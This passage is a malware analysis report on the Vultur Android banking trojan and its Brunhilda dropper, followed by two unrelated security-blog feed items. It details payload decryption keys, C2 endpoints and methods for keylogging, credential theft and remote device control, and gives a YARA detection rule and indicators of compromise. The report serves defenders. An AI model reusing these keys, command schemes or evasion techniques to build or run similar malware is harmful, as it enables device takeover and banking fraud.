APP_NAME variable is replaced with the text “McAfee Master Protection”. In addition to the HTML content, an extra warning message is displayed to further convince the victim into enabling Accessibility Service permissions for the app. This message contains the text “Your system not safe, service McAfee Master Protection turned off. For using full device protection turn it on.” When the warning is displayed, it also sets the value of the SharedPreference key 1590d3a3-1d8e-4ee9-afde-fcc174964db4 to true. This value is later checked in the onAccessibilityEvent() method and the onServiceConnected() method of the malicious app’s Accessibility Service. ANALYST COMMENT
An important observation here, is that the malicious app is using the com.google.android.marvin.talkback package name for its Accessibility Service. This is the package name of the official Android Accessibility Suite, as can be seen from the following link: https://play.google.com/store/apps/details?id=com.google.android.marvin.talkback.
The implementation is of course different from the official Android Accessibility Suite and contains malicious code. When the Accessibility Service privileges have been enabled for the payload, it automatically grants itself additional permissions to install apps from unknown sources, and installs the next payload through the UpdateActivity. Figure 12: Decryption and installation of the second Vultur payload. The second encrypted APK is hidden in a file named data that is stored within the app’s “assets” directory. The decryption algorithm is again implemented in native code, and is the same as in the dropper. This time, it uses a different decryption key that is derived from the DXMgKBY29QYnRPR1k1STRBNTZNUw== string. The substring reveals the actual key used in this sample: Y29QYnRPR1k1STRB (key varies across samples). After decrypting, we are presented with the next layer of Vultur. Layer 2: Vultur descends The second Vultur APK contains more important functionality, such as AlphaVNC and ngrok setup, displaying of custom HTML code in WebViews, screen recording, and more. Just like the previous versions of Vultur, the latest edition still includes the ability to remotely access the infected device through AlphaVNC and ngrok. This second Vultur payload also uses the com.google.android.marvin.talkback (Android Accessibility Suite) package name for the malicious Accessibility Service. From here, there are multiple references to methods invoked from another file: the final Vultur payload. This time, the payload is not decrypted from native code. In this sample, an encrypted file named a.int is decrypted using AES/CFB/NoPadding with the decryption key SBhXcwoAiLTNIyLK (stored in SharedPreference key dffa98fe-8bf6-4ed7-8d80-bb1a83c91fbb). We have observed the same decryption key being used in multiple samples for decrypting payload #3. Figure 13: Decryption of the third Vultur payload. Furthermore, from payload #2 onwards, Vultur uses encrypted SharedPreferences for further hiding of malicious configuration related key-value pairs. Layer 3: Vultur strikes The final payload is a Dalvik Executable (DEX) file. This decrypted DEX file holds Vultur’s core functionality. It contains the references to all of the C2 methods (used in communication from bot to C2 server, in order to send or retrieve information) and FCM commands (used in communication from C2 server to bot, in order to perform actions on the infected device). An important observation here, is that code defined in payload #3 can be invoked from payload #2 and vice versa. This means that these final two files effectively work together. Figure 14: Decompiled code snippet showing some of the FCM commands implemented in Vultur payload #3. The last Vultur payload does not contain its own Accessibility Service, but it can interact with the Accessibility Service that is implemented in payload #2. C2 Communication: Vultur finds its voice When Vultur infects a device, it initiates a series of communications with its designated C2 server. Communications related to C2 methods such as application.register and vnc.blocked.packages occur using JSON-RPC 2.0 over HTTPS. These requests are sent from the infected device to the C2 server to either provide or receive information. Actual vultures lack a voice box; their vocalisations include rasping hisses and grunts [4]. 
While the communication in older variants of Vultur may have sounded somewhat similar to that, you could say that the threat actors have developed a voice box for the latest version of Vultur. The content of the aforementioned requests is now AES encrypted and Base64 encoded, just like the server response. In addition to encrypted communication over HTTPS, the bot can receive commands via Firebase Cloud Messaging (FCM). FCM is a cross-platform messaging solution provided by Google. The FCM related commands are sent from the C2 server to the infected device to perform actions on it. During our investigation of the latest Vultur variant, we identified the C2 endpoints mentioned below.
  • /ejr/ – Endpoint for C2 communication using JSON-RPC 2.0. Note: in older versions of Vultur the /rpc/ endpoint was used for similar communication.
  • /upload/ – Endpoint for uploading files (such as screen recording results).
  • /version/app/?filename=ngrok&arch={DEVICE_ARCH} – Endpoint for downloading the relevant version of ngrok.
  • /version/app/?filename={FILENAME} – Endpoint for downloading a file specified by the payload (related to the new file manager functionality).
C2 methods in Brunhilda dropper The commands below are sent from the infected device to the C2 server to either provide or receive information.
  • application.register – Registers the bot by providing the malware package name and information about the device: model, country, installed apps, Android version. It also sends a tag that is used for identifying the dropper campaign name. Note: this method is also used once in Vultur payload #1, but without sending a tag. This method then returns a token to be used in further communication with the C2 server.
  • application.state – Sends a token value that was set as a response to the application.register command, together with a status code of “3”.
C2 methods in Vultur The commands below are sent from the infected device to the C2 server to either provide or receive information.
  • vnc.register (UPDATED) – Registers the bot by providing the FCM token, malware package name and information about the device: model, country, Android version. This method has been updated in the latest version of Vultur to also include information on whether the infected device is rooted and if it is detected as an emulator.
  • vnc.status (UPDATED) – Sends the following status information about the device: if the Accessibility Service is enabled, if the Device Admin permissions are enabled, if the screen is locked, what the VNC address is. This method has been updated in the latest version of Vultur to also send information related to: active fingerprints on the device, screen resolution, time, battery percentage, network operator, location.
  • vnc.apps – Sends the list of apps that are installed on the victim’s device.
  • vnc.keylog – Sends the keystrokes that were obtained via keylogging.
  • vnc.config (UPDATED) – Obtains the config of the malware, such as the list of targeted applications by the keylogger and VNC. This method has been updated in the latest version of Vultur to also obtain values related to the following new keys: “packages2”, “rurl”, “recording”, “main_content”, “tvmq”.
  • vnc.overlay – Obtains the HTML code for overlay injections of a specified package name using the pkg parameter. It is still unclear whether support for overlay injections is fully implemented in Vultur.
  • vnc.overlay.logs – Sends the stolen credentials that were obtained via HTML overlay injections. It is still unclear whether support for overlay injections is fully implemented in Vultur.
  • vnc.pattern (NEW) – Informs the C2 server whether a PIN pattern was successfully extracted and stored in the application’s Shared Preferences.
  • vnc.snapshot (NEW) – Sends JSON data to the C2 server, which can contain:

1. Information about the accessibility event’s class, bounds, child nodes, UUID, event type, package name, text content, screen dimensions, time of the event, and if the screen is locked.
2. Recently copied text, and SharedPreferences values related to “overlay” and “keyboard”.
3. X and Y coordinates related to a click.vnc.submit (NEW)Informs the C2 server whether the bot registration was successfully submitted or if it failed.vnc.urls (NEW)Informs the C2 server about the URL bar related element IDs of either the Google Chrome or Firefox webbrowser (depending on which application triggered the accessibility event).vnc.blocked.packages (NEW)Retrieves a list of “blocked packages” from the C2 server and stores them together with custom HTML code in the application’s Shared Preferences. When one of these package names is detected as running on the victim device, the malware will automatically press the back button and display custom HTML content if available. If unavailable, a default “Temporarily Unavailable” message is displayed.vnc.fm (NEW)Sends file related information to the C2 server. File manager functionality includes downloading, uploading, installing, deleting, and finding of files.vnc.syslogSends logs.crash.logsSends logs of all content on the screen.installer.config (NEW)Retrieves the HTML code that is displayed in a WebView of the first Vultur payload. This HTML code contains instructions to enable Accessibility Services permissions. FCM commands in Vultur The commands below are sent from the C2 server to the infected device via Firebase Cloud Messaging in order to perform actions on the infected device. The new commands use IDs instead of names that describe their functionality. These command IDs are the same in different samples. CommandDescriptionregisteredReceived when the bot has been successfully registered.startStarts the VNC connection using ngrok.stopStops the VNC connection by killing the ngrok process and stopping the VNC service.unlockUnlocks the screen.deleteUninstalls the malware package.patternProvides a gesture/stroke pattern to interact with the device’s screen.109b0e16 (NEW)Presses the back button.18cb31d4 (NEW)Presses the home button.811c5170 (NEW)Shows the overview of recently opened apps.d6f665bf (NEW)Starts an app specified by the payload.1b05d6ee (NEW)Shows a black view.1b05d6da (NEW)Shows a black view that is obtained from the layout resources in Vultur payload #2.7f289af9 (NEW)Shows a WebView with HTML code loaded from SharedPreference key “946b7e8e”.dc55afc8 (NEW)Removes the active black view / WebView that was added from previous commands (after sleeping for 15 seconds).cbd534b9 (NEW)Removes the active black view / WebView that was added from previous commands (without sleeping).4bacb3d6 (NEW)Deletes an app specified by the payload.b9f92adb (NEW)Navigates to the settings of an app specified by the payload.77b58a53 (NEW)Ensures that the device stays on by acquiring a wake lock, disables keyguard, sleeps for 0,1 second, and then swipes up to unlock the device without requiring a PIN.ed346347 (NEW)Performs a click.5c900684 (NEW)Scrolls forward.d98179a8 (NEW)Scrolls backward.7994ceca (NEW)Sets the text of a specified element ID to the payload text.feba1943 (NEW)Swipes up.d403ad43 (NEW)Swipes down.4510a904 (NEW)Swipes left.753c4fa0 (NEW)Swipes right.b183a400 (NEW)Performs a stroke pattern on an element across a 3×3 grid.81d9d725 (NEW)Performs a stroke pattern based on x+y coordinates and time duration.b79c4b56 (NEW)Press-and-hold 3 times near bottom middle of the screen.1a7493e7 (NEW)Starts capturing (recording) the screen.6fa8a395 (NEW)Sets the “ShowMode” of the keyboard to 0. This allows the system to control when the soft keyboard is displayed.9b22cbb1 (NEW)Sets the “ShowMode” of the keyboard to 1. 
This means the soft keyboard will never be displayed (until it is turned back on).98c97da9 (NEW)Requests permissions for reading and writing external storage.7b230a3b (NEW)Request permissions to install apps from unknown sources.cc8397d4 (NEW)Opens the long-press power menu.3263f7d4 (NEW)Sets a SharedPreference value for the key “c0ee5ba1-83dd-49c8-8212-4cfd79e479c0” to the specified payload. This value is later checked for in other to determine whether the long-press power menu should be displayed (SharedPref value 1), or whether the back button must be pressed (SharedPref value 2).request_accessibility (UPDATED)Prompts the infected device with either a notification or a custom WebView that instructs the user to enable accessibility services for the malicious app. The related WebView component was not present in older versions of Vultur.announcement (NEW)Updates the value for the C2 domain in the SharedPreferences.5283d36d-e3aa-45ed-a6fb-2abacf43d29c (NEW)Sends a POST with the vnc.config C2 method and stores the malware config in SharedPreferences.09defc05-701a-4aa3-bdd2-e74684a61624 (NEW)Hides / disables the keyboard, obtains a wake lock, disables keyguard (lock screen security), mutes the audio, stops the “TransparentActivity” from payload #2, and displays a black view.fc7a0ee7-6604-495d-ba6c-f9c2b55de688 (NEW)Hides / disables the keyboard, obtains a wake lock, disables keyguard (lock screen security), mutes the audio, stops the “TransparentActivity” from payload #2, and displays a custom WebView with HTML code loaded from SharedPreference key “946b7e8e” (“tvmq” value from malware config).8eac269d-2e7e-4f0d-b9ab-6559d401308d (NEW)Hides / disables the keyboard, obtains a wake lock, disables keyguard (lock screen security), mutes the audio, stops the “TransparentActivity” from payload #2.e7289335-7b80-4d83-863a-5b881fd0543d (NEW)Enables the keyboard and unmutes audio. Then, sends the vnc.snapshot method with empty JSON data.544a9f82-c267-44f8-bff5-0726068f349d (NEW)Retrieves the C2 command, payload and UUID, and executes the command in a thread.a7bfcfaf-de77-4f88-8bc8-da634dfb1d5a (NEW)Creates a custom notification to be shown in the status bar.444c0a8a-6041-4264-959b-1a97d6a92b86 (NEW)Retrieves the list of apps to block and corresponding HTML code through the vnc.blocked.packages C2 method and stores them in the blocked_package_template SharedPreference key.a1f2e3c6-9cf8-4a7e-b1e0-2c5a342f92d6 (NEW)Executes a file manager related command. Commands are:

1. 91b4a535-1a78-4655-90d1-a3dcb0f6388a – Downloads a file
2. cf2f3a6e-31fc-4479-bb70-78ceeec0a9f8 – Uploads a file
3. 1ce26f13-fba4-48b6-be24-ddc683910da3 – Deletes a file
4. 952c83bd-5dfb-44f6-a034-167901990824 – Installs a file
  5. 787e662d-cb6a-4e64-a76a-ccaf29b9d7ac – Finds files containing a specified pattern.
Detection Writing YARA rules to detect Android malware can be challenging, as APK files are ZIP archives. This means that extracting all of the information about the Android application would involve decompressing the ZIP, parsing the XML, and so on. Thus, most analysts build YARA rules for the DEX file. However, DEX files, such as Vultur payload #3, are less frequently submitted to VirusTotal as they are uncovered at a later stage in the infection chain. To maximise our sample pool, we decided to develop a YARA rule for the Brunhilda dropper. We discovered some unique hex patterns in the dropper APK, which allowed us to create the YARA rule below.
rule brunhilda_dropper
{
    meta:
        author = "Fox-IT, part of NCC Group"
        description = "Detects unique hex patterns observed in Brunhilda dropper samples."
        target_entity = "file"
    strings:
        $zip_head = "PK"
        $manifest = "AndroidManifest.xml"
        $hex1 = {63 59 5c 28 4b 5f}
        $hex2 = {32 4a 66 48 66 76 64 6f 49 36}
        $hex3 = {63 59 5c 28 4b 5f}
        $hex4 = {30 34 7b 24 24 4b}
        $hex5 = {22 69 4f 5a 6f 3a}
    condition:
        $zip_head at 0 and $manifest and #manifest >= 2 and 2 of ($hex*)
} Wrap-up Vultur’s recent developments have shown a shift in focus towards maximising remote control over infected devices. With the capability to issue commands for scrolling, swipe gestures, clicks, volume control, blocking apps from running, and even incorporating file manager functionality, it is clear that the primary objective is to gain total control over compromised devices. Vultur has a strong correlation to Brunhilda, with its C2 communication and payload decryption having the same implementation in the latest variants. This indicates that both the dropper and Vultur are being developed by the same threat actors, as has also been uncovered in the past. Furthermore, masquerading malicious activity through the modification of legitimate applications, encryption of traffic, and the distribution of functions across multiple payloads decrypted from native code, shows that the actors put more effort into evading detection and complicating analysis. During our investigation of recently submitted Vultur samples, we observed the addition of new functionality occurring shortly after one another. This suggests ongoing and active development to enhance the malware’s capabilities. In light of these observations, we expect more functionality being added to Vultur in the near future. Indicators of Compromise Analysed samples Package nameFile hash (SHA-256)Descriptioncom.wsandroid.suiteedef007f1ca60fdf75a7d5c5ffe09f1fc3fb560153633ec18c5ddb46cc75ea21Brunhilda Droppercom.medical.balance89625cf2caed9028b41121c4589d9e35fa7981a2381aa293d4979b36cf5c8ff2Vultur payload #1com.medical.balance1fc81b03703d64339d1417a079720bf0480fece3d017c303d88d18c70c7aabc3Vultur payload #2com.medical.balance4fed4a42aadea8b3e937856318f9fbd056e2f46c19a6316df0660921dd5ba6c5Vultur payload #3com.wsandroid.suite001fd4af41df8883957c515703e9b6b08e36fde3fd1d127b283ee75a32d575fcBrunhilda Dropperse.accessibility.appfc8c69bddd40a24d6d28fbf0c0d43a1a57067b19e6c3cc07e2664ef4879c221bVultur payload #1se.accessibility.app7337a79d832a57531b20b09c2fc17b4257a6d4e93fcaeb961eb7c6a95b071a06Vultur payload #2se.accessibility.app7f1a344d8141e75c69a3c5cf61197f1d4b5038053fd777a68589ecdb29168e0cVultur payload #3com.wsandroid.suite26f9e19c2a82d2ed4d940c2ec535ff2aba8583ae3867502899a7790fe3628400Brunhilda Droppercom.exvpn.fastvpn2a97ed20f1ae2ea5ef2b162d61279b2f9b68eba7cf27920e2a82a115fd68e31fVultur payload #1com.exvpn.fastvpnc0f3cb3d837d39aa3abccada0b4ecdb840621a8539519c104b27e2a646d7d50dVultur payload #2com.wsandroid.suite92af567452ecd02e48a2ebc762a318ce526ab28e192e89407cac9df3c317e78dBrunhilda Dropperjk.powder.tendencefa6111216966a98561a2af9e4ac97db036bcd551635be5b230995faad40b7607Vultur payload #1jk.powder.tendencedc4f24f07d99e4e34d1f50de0535f88ea52cc62bfb520452bdd730b94d6d8c0eVultur payload #2jk.powder.tendence627529bb010b98511cfa1ad1aaa08760b158f4733e2bbccfd54050838c7b7fa3Vultur payload #3com.wsandroid.suitef5ce27a49eaf59292f11af07851383e7d721a4d60019f3aceb8ca914259056afBrunhilda Dropperse.talkback.app5d86c9afd1d33e4affa9ba61225aded26ecaeb01755eeb861bb4db9bbb39191cVultur payload #1se.talkback.app5724589c46f3e469dc9f048e1e2601b8d7d1bafcc54e3d9460bc0adeeada022dVultur payload #2se.talkback.app7f1a344d8141e75c69a3c5cf61197f1d4b5038053fd777a68589ecdb29168e0cVultur payload #3com.wsandroid.suitefd3b36455e58ba3531e8cce0326cce782723cc5d1cc0998b775e07e6c2622160Brunhilda Droppercom.adajio.storm819044d01e8726a47fc5970efc80ceddea0ac9bf7c1c5d08b293f0ae571369a9Vultur payload #1com.adajio.storm0f2f8adce0f1e1971cba5851e383846b68e5504679d916d7dad10133cc965851Vultur 
payload #2com.adajio.stormfb1e68ee3509993d0fe767b0372752d2fec8f5b0bf03d5c10a30b042a830ae1aVultur payload #3com.protectionguard.appd3dc4e22611ed20d700b6dd292ffddbc595c42453f18879f2ae4693a4d4d925aBrunhilda Dropper (old variant)com.appsmastersafeyf4d7e9ec4eda034c29b8d73d479084658858f56e67909c2ffedf9223d7ca9bd2Vultur (old variant)com.datasafeaccountsanddata.club7ca6989ccfb0ad0571aef7b263125410a5037976f41e17ee7c022097f827bd74Vultur (old variant)com.app.freeguarding.twofactorc646c8e6a632e23a9c2e60590f012c7b5cb40340194cb0a597161676961b4de0Vultur (old variant) Note: Vultur payloads #1 and #2 related to Brunhilda dropper 26f9e19c2a82d2ed4d940c2ec535ff2aba8583ae3867502899a7790fe3628400 are the same as Vultur payloads #2 and #3 in the latest variants. The dropper in this case only drops two payloads, where the latest versions deploy a total of three payloads. C2 servers
  • safetyfactor[.]online
  • cloudmiracle[.]store
  • flandria171[.]appspot[.]com (FCM)
  • newyan-1e09d[.]appspot[.]com (FCM)
Dropper distribution URLs
  • mcafee[.]960232[.]com
  • mcafee[.]353934[.]com
  • mcafee[.]908713[.]com
  • mcafee[.]784503[.]com
  • mcafee[.]053105[.]com
  • mcafee[.]092877[.]com
  • mcafee[.]582630[.]com
  • mcafee[.]581574[.]com
  • mcafee[.]582342[.]com
  • mcafee[.]593942[.]com
  • mcafee[.]930204[.]com
References
  1. https://resources.prodaft.com/brunhilda-daas-malware-report
  2. https://www.threatfabric.com/blogs/vultur-v-for-vnc
  3. https://www.threatfabric.com/blogs/the-attack-of-the-droppers
  4. https://www.wildlifecenter.org/vulture-facts
Categorías: Security Posts

Cybersecurity Concerns for Ancillary Strength Control Subsystems

BreakingPoint Labs Blog - Jue, 2023/10/19 - 19:08
Additive manufacturing (AM) engineers have been incredibly creative in developing ancillary systems that modify a printed part’s mechanical properties. These systems mostly focus on the issue of anisotropic properties of additively built components. This blog post is a good reference if you are unfamiliar with isotropic vs. anisotropic properties and how they impact 3D printing. […] The post Cybersecurity Concerns for Ancillary Strength Control Subsystems appeared first on BreakPoint Labs - Blog.
Categorías: Security Posts

Update on Naked Security

Naked Security Sophos - Mar, 2023/09/26 - 12:00
To consolidate all of our security intelligence and news in one location, we have migrated Naked Security to the Sophos News platform.
Categorías: Security Posts